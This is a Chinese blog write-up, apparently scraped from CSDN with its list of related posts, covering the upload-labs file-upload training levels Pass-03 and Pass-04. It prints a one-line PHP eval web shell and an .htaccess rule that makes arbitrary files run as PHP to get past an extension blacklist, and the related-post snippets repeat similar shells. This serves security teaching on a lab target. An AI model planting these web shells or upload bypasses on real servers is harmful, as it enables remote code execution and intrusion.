3/4.upload-labs—Pass03和Pass04

最新推荐文章于 2024-09-12 02:38:24 发布
最新推荐文章于 2024-09-12 02:38:24 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: # 1.upload-labs 文章标签: upload-labs-3/4 文件删除扩展名htaccess
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/104846799
版权
这篇博客介绍了Pass03和Pass04中遇到的上传限制与绕过技巧。首先,尝试上传shell.php被限制,接着通过上传.htaccess文件并利用其配置来实现文件上传,最终成功上传并使用菜刀连接进行控制。
摘要由CSDN通过智能技术生成

一、Pass-03/Pass-04

1、上传一个shell.php

shell.php内容为:<?php @eval($_POST['123']);?>

结果,提示不允许上传.asp .aspx .php .jsp后缀的文件
在这里插入图片描述
2、黑名单未限制.htaccess的情况:

①、上传.htaccess文件

文件内容为:<FilesMatch "qwsn">
SetHandler application/x-httpd-php
</FilesMatch>

1、由于后端,也就是服务器端的后缀名黑名单限制很多,并且没有限制.htaccess文件

2、我们直接使用.htaccess   让匹配qwsn这四个字符的文件,被解析为PHP形式
//.htaccess的作用:就是任意添加PHP解析的匹配文件

3.注意:.htaccess生效的条件:
在Apache服务器的配置文件httpd.conf中:
①、AllowOverride None   改为:   AllowOverride All
②、把LoadModule rewrite_module modules/mod_rewrite.so前面的注释符号#删除
③、.htaccess文件必须要在网站的根目录下,比如此处的WWW下才行,而且apache需要重启	(这个百度来的,瞎扯。。。。的吧这个)

如下图

最低0.47元/天 解锁文章
qwsn
关注
专栏目录
Upload-Labs-Pass-03
龙狼刺的博客
04-09 1172
一、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 二、文件上传 1、制作一句话木马 命令:<?php @eval($_POST['hacker']); ?> 2、设置代理 设置浏览器代理 设置BurpSuite代理 3、文件上传 设置完Payload后,点击Start attcck。 复制UR...
5.upload-labs—Pass05
qwsn
03-13 3025
一、Pass05 1、上传一个shell.php shell.php内容为:<?php @eval($_POST['123']);?> //结果如下图所示,提示我们此文件不允许上传 2、扩展名黑名单绕过方法: ①、上传,shell.php.jpg //尝试是否存在apache的解析漏洞 //结果,不能解析 ②、上传.htaccess //尝试,是否被过滤 //结果,被过滤 ③、打开...
upload-labs】————4、Pass-03
Fly_鹏程万里
08-15 529
Pass-03闯关界面 首先判断是前端检测还是服务器端检测,安装套路上传一个shell.php文件,同时使用burpsuite代理,看是否通过burpsuite代理,以及最后返回的提示信息: 经过burpsuite————后端检测 返回的检测信息: 从上面简易的测试,我们可以了解到本关属于服务器端检测,而且采用了黑名单的检测方法,那么我们只需要将上传的文件名改为不在黑名单且能够...
upload-labs Pass-03(黑名单验证,特殊后缀)问题纠正_uploadpass03黑名单上传成功后缀名为
最新发布
2401_86951123的博客
09-12 554
systemctl is-active nginx &> /dev/null || { color “nginx 启动失败,退出![ -e ${NGINX_INSTALL_DIR} ] && { color “nginx 已安装,请卸载后再安装” 1;color “开始安装 nginx 依赖包” 0。{TAR}文件失败” 1;color “nginx 用户已存在” 1。color “创建 nginx 用户” 0。color “开始安装 nginx” 0。color “nginx 安装完成” 0。
Upload LABS Pass-4
热门推荐
wangyuxiang946的博客
07-02 1万+
uploadlabs4,upload labs 第四关在后端使用了黑名单,并过滤了空格,点,以及大小写 , 但未过滤 .htaccess(分布式配置) , 固此关卡使用 分布式配置文件绕过黑名单
Upload-labs文件上传漏洞(黑名单判断)—— Pass03
Zichel77的博客
07-27 893
0×00 题目描述 0×01 解题过程 看提示觉得并没有什么用,于是想要尝试按照老办法上传,看问题究竟出在哪里 首先直接上传php文件,看报错信息使用的是什么方式返回的 意味着可以抓包返回 于是尝试pass02中的修改Content-Type的方法 结果依旧上传不成功 查看一下题目的源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(U..
文件上传--Upload-labs--Pass03--特殊后缀与::$DATA绕过
2302_79800344的博客
02-17 1699
利用特殊后缀名 或 ::$DATA 绕过何尝不是一种好的选择
Upload-Labs-Pass-09
龙狼刺的博客
04-23 264
目录 一、相关知识 1、路径拼接绕过原理 二、环境搭配 三、文件上传 1、创建webshell 2、修改文件名 3、文件上传 四、Weevely连接 一、相关知识 1、路径拼接绕过原理 在没有对上传文件进行重命名的情况下,用户可以自定义文件名并在服务器中上传新建,就会造成对应的绕过黑名单。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130...
upload-labs通关秘籍和安装环境
weixin_47543868的博客
12-18 8157
upload-labs通关一.什么是upload-labs?二.漏洞三.安装环境四.小试牛刀第一关 pass-01 客户端检测绕过(js检测)第二关 pass-02 content-type(服务器端检测–MIME 类型)第三关 上传可解析的文件后缀名第四关 黑名绕过 .htaccess第五关 黑名单 大小写绕过第六关 黑名单 空格绕过第七关 黑名单 点绕过第八关 黑名单 ::$DATA第九关 点 空格绕过黑名单第十关 双写绕过黑名单第十一关第十二关第十三关第十四关第十五关第十六关第十七关 一.什么
upload-labs19-20以及总结1
08-08
3. **文件类型检查**:源码中虽然对文件类型进行了检查,但只检查了MIME类型,并未验证实际文件内容。这意味着即使MIME类型设置为允许的类型(如"image/jpeg"),如果文件本身是PHP代码,依然可以被上传。 4. **黑...
upload-labs:pass-04
羽的博客
07-07 566
后端过滤了很多东西,大小写也过滤了。 想到有个.htaccess后缀还可以用。 (文件名): .htaccess: (内容) : SetHandler application/x-httpd-php 他的作用就是可以把后端的任意后缀名的文件当做PHP文件来执行(虽然理解有点粗暴,不过道理就是这样啊) 所以我们就直接传马 这个在操作时,会在后端对配置文件有要求,不是特定的环境不能用,算其中的一种绕过姿势了 ...
upload-labs pass3-9
kkzzjx
06-16 351
文章目录pass03pass04pass05pass06pass07-09 pass03 if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot(
upload-labs靶场-Pass-04关-思路以及过程
weixin_44257023的博客
01-14 1409
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
Upload-labs Pass-03 黑名单限制 解析漏洞
baynk的博客
11-03 2030
Pass-03 黑名单限制 0x01 过程 直接上传php文件。 有黑名单提示了,这里反应了一段时间,同时还是去检查了下JS,确实是后端的黑名单限制。我这里传了一个jpg上去。 发现可以上传成功的,查看下图片的链接src="../upload/201911031519209854.jpg",发现进行了重命名,只以最后的后缀名为真正的后缀名,这里就只能去尝试看有没有任意后缀名上传,php,php...
upload-labs】pass-04 .htaccess绕过
qq_43665434的博客
03-18 1753
upload-labs】pass-04 .htaccess绕过 1、测试流程 玩法一 先尝试上传一个php文件: 如图所示,提示此文件不允许上传。 抓包改后缀试试: Apache解析漏洞:Apache会将不认识的后缀,如suibianxie.php.xxx.ccc、test.php.iii等从右向左解析,不认识就往左移一个,最终移到php时apache认识了就会将该文件当作php文件来解析。 如图所示上传成功,而且文件名没有改。 用浏览器去访问该文件: 发现被成功解析了。 这有点太轻松了,想换一
upload-labs】————5、Pass-04
Fly_鹏程万里
08-15 439
闯关界面 首先上传一个shell.php文件看看对于上传文件的检测是前端检测还是后端检测: 之后我们来查看一下源代码: 从上面可以看到基本上过滤了所有的常见的后缀名,而且先全部进行小写转换,对文件后缀名进行拆分,之后来进行检测,看起来好像没有戏了,那么这种情况下怎么办呢?不妨试试.htaccess攻击看看: 首先我们上传一个.htaccess文件文件内容如下: ...
CTFweb篇——upload-labs(Pass02-Pass03)
suiyideAli的博客
09-24 818
CTFweb篇——upload-labs(Pass02-Pass03) 0X00 前言 Pass02与03在文件上传的题目中算是简单的基础题,涉及的操作不是很多。 0X01 Pass02 查看题目: 这里可以看到提示是:服务器端对数据包的MIME进行检查,借用找到的很久之前的一个帖子详解 MIME类型-服务端验证上传文件的类型 开始进行上传 上传122.php 使用Burp Suite进行抓包 ...
[网络安全]upload-labs Pass-04 解题详析
等风来
08-14 4294
htaccess(Hypertext Access)是一个用于配置Apache服务器行为的配置文件。它通常位于网站的根目录或特定目录中,并用来控制目录下的文件访问权限、重定向、错误处理、认证等方面的设置。当服务器收到对"asdfg.jpg"文件的请求时,根据该指令,服务器会将其当作PHP脚本来处理,而不是直接将其作为静态图片返回给用户。这段代码是使用.htaccess文件的FilesMatch指令来对特定的文件进行处理。因此我们可以上传.htaccess文件,实现能够访问脚本文件、执行脚本即可。
upload-labs第三关 pass-03 黑名单绕过
weixin_44522540的博客
02-26 3706
四、pass-03 黑名单绕过 提示:本pass禁止上传.asp|.aspx|.php|.jsp后缀文件! 源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['uploa
upload-labs/Pass-07 漏洞复现
09-08
你好!对于 upload-labs 的 Pass-07 漏洞复现,我可以给你一些指导。首先,请确保你已经下载并配置好了 upload-labs 的环境。 Pass-07 是一个文件上传漏洞的挑战,目标是成功绕过上传限制并执行恶意代码。 以下是一般的漏洞复现步骤: 1. 打开 Pass-07 挑战页面,通常是通过浏览器访问 `http://your-domain/Pass-07/index.php`。 2. 查看上传功能的代码,通常在页面的源代码(HTML)或服务器端代码(PHP)中。 3. 了解限制条件,比如文件类型、大小或者其他限制。 4. 尝试上传常见的可执行文件,如 `.php` 或 `.exe` 文件,观察是否被限制。 5.***上传一个恶意文件,并观察目标系统是否执行了该文件。 7. 如果成功执行恶意文件,完成挑战。 请注意,这只是一般的复现步骤,具体的漏洞可能因各种因素而有所不同。我建议你查看 upload-labs 提供的详细说明和提示,以便更好地理解和复现该漏洞。 希望这些信息能对你有所帮助!如果你有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值